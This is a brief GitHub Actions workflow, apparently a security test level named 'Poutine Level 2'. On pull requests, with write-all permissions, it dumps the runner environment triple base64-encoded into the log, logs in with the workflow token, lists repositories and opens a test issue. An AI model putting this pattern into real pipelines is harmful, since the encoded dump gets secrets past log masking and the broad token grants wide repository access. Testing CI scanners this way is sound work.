name: Poutine Level 2
on:
  pull_request:
    
permissions: write-all

jobs:
  pulled_pork:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    permissions: write-all
    steps:
      - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0
        with:
          egress-policy: audit
      - run: | 
          sh -c 'env | base64 -w0 | base64 -w0 | base64 -w0'
          echo "${{ secrets.GITHUB_TOKEN }}" | gh auth login --with-token
          gh repo list > list
          cat list
          gh auth status
          gh issue create --title "Litios test" --body "This is a test" --repo $GITHUB_REPOSITORY
          echo "HERE"
          sleep 15
